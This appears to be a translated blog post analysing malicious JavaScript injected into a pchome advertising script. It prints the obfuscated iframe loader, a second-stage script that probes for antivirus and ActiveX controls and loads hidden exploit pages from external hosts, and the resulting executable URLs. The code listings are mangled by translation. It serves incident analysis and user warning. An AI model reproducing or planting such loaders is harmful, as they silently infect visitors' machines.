Last week's virus infection unexpectedly turned out to come from Ad.pchome.net, which had been "horse-hung" (had a malicious loader injected into it) _ virus killing
Last Update:2017-01-18
The injection is fairly well concealed: the following code had been added in the middle of http://btn.pchome.net/flash.js:
// Injected line as found in flash.js, kept verbatim as an analysis sample.
// The two bracketed strings are \xNN escapes spelling the property names document and writeln,
// and the argument decodes to an iframe tag with height=0 and width=0 whose src is a page on
// www.59.vc, so an invisible frame is written into every page that runs this file.
// The stray spaces inside some escapes (for example "\x68\ x65"), the upper-case X in "\ X77" and
// the missing closing bracket after the first string look like copy artefacts of this listing;
// as printed, the line is not valid JavaScript.
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] (' \x3c\x69\x66\x72\x61\x6d\x65 \x68\ x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\ X77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\ x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e ');
Decoded, that is:
// Decoded form of the injected line, as printed by the author.
// The escapes in the injected line spell the lower-case names document and writeln; the capitalised
// names, the mixed quotes and the truncated closing iframe tag shown here are artefacts of
// translation and copying, so this line does not reproduce the decoded bytes exactly.
window["Document" ["Writeln"] (' <iframe height=0 width=0 src= ' http://www.59.vc/page/add_644455.htm " Iframe> ');
On its own, however, this JS does not make the IFRAME take effect; what puts it into effect is the page code that calls this JS to display Flash:
<!-- Page-side call that the author reports as the trigger: the page invokes the Flash-writing
     helper (presumably defined in flash.js; its definition is not shown here) to embed a 300x250
     banner. NOTE(review): the attribute and function-name capitalisation in this listing appears
     altered by translation. -->
<script language= "javascript" type= "Text/javascript" >
Writeflashhtml ("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250", "_wmode= Opaque ");
</script>
With this call the IFRAME takes effect. Following a few further calls and decrypting them leads to this script:
// Second-stage script as recovered by the author, kept verbatim as an analysis sample.
// Translation has mangled its capitalisation, spacing and quoting, so it is not runnable as shown.
// What the visible code does:
//  - biskis() walks drive letters C to Z (character codes 65+i for i = 2..25) and points two image
//    objects at help.gif inside the Kaspersky Internet Security 6.0 and 7.0 context.chm through the
//    mk:@MSITStore protocol. It returns true when either image reports a height of 41, presumably the
//    height of the real help.gif, which would mean the product is installed.
//  - The main body runs only when biskis() is false and the cookie string has no cookie1= entry.
//    It then sets cookie1=popwindos with an expiry 24 hours ahead, so a given browser is processed
//    at most once a day.
//  - Each try block tests one condition (instantiating an ActiveX ProgID, or the user agent NOT
//    containing msie 7) and, when it holds, writes a display:none iframe pointing at a matching
//    page on w18.vg. The empty catch blocks swallow the error when a control is absent.
//    The ProgID in the fifth try block is garbled in this listing.
//  - The repeated aaxxx assignments do not feed into any condition visible here (filler).
// Review notes: the w18.vg paths end in .gif but are loaded as iframe documents, so the extension
// should not be trusted as a content type. The hosts, paths and the cookie1=popwindos cookie in
// this line can serve as indicators when searching proxy or browser history for affected clients.
Function biskis () {for (i=2;i<26;i++) {var kis6=new image (); Var kis7=new image (); var root=string.fromcharcode (65+i); kis6.src= "mk: @MSITStore:" +root+ ": \\program files\\kaspersky lab \\kaspersky internet security 6.0\\doc\\context.chm::/images/help.gif "kis7.src=" mk: @MSITStore: "+root+": \\program files\\kaspersky lab\\kaspersky internet security 7.0\\doc\\ Context.chm::/images/help.gif "; if (kis6.height==41| | kis7.height==41) return true}return false}var then=new date (); aaxxx= "Xxxyyyyfassssfsadfasdf "; Then.settime (Then.gettime () +24*60*60*1000); var aaffdasfascookie=new string (document.cookie); var cookieheader= "cookie1="; aaxxx= "XXXYYYYFASSSSFSADFASDF"; if (!biskis () &&aaffdasfascookie.indexof ( Cookieheader) ==-1 {aaxxx= "xxxyyyyfassssfsadfasdf";d ocument.cookie= "cookie1=popwindos;expires=" + Then.togmtstring (); aaxxx= "Xxxyyyyfassssfsadfasdf"; Try{if (New activexobject ("Ierpctl.ierpctl.1 ")) document.write (' <iframe style=display:none src=" Http://w18.vg/real.gif "></iframe>") }catch (e) {}try{if (Navigator.userAgent.toLowerCase (). IndexOf ("msie 7") ==-1) document.write (' <iframe style=display:none src= "Http://w18.vg/ms.gif" ></iframe> ")}catch (e) {}try{if (new ActiveXObject ("Dpclient.vod")) document.write (' <iframe style=display:none src= ' http://w18.vg/ Xl.gif "></iframe>")}catch (e) {}try{if (New activexobject ("Glchat. GLCHATCTRL.1 ")) document.write (' <iframe style=display:none src= ' http://w18.vg/lz.gif ' ></ Iframe> ')}catch (e) {}try{if ("MPS") (New activexobject). Stormplayer.1 ")) document.write (' <iframe style=display:none src= ' http://w18.vg/bf.gif ' ></ Iframe> ')}catch (e) {}try{if (New activexobject ("BAIDUBAR.TOOL.1")) document.write (' <iframe style= Display:none src= "Http://w18.vg/baidu.gif" ></iframe> ")}catch (e) {}}
I picked a few of these pages and decrypted them, which led to: Http://w18.vg/s.exe
That file in turn yields another link: Http://w18.vg/ss.exe
Something that looks familiar ...
From the above, the problem lies in flash.js, so every page that uses this JS to embed Flash is infected. I checked a few pages at random and found them all infected; this time it is a large-scale injection, so everyone please be careful.
When reprinting, please keep this statement! (http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)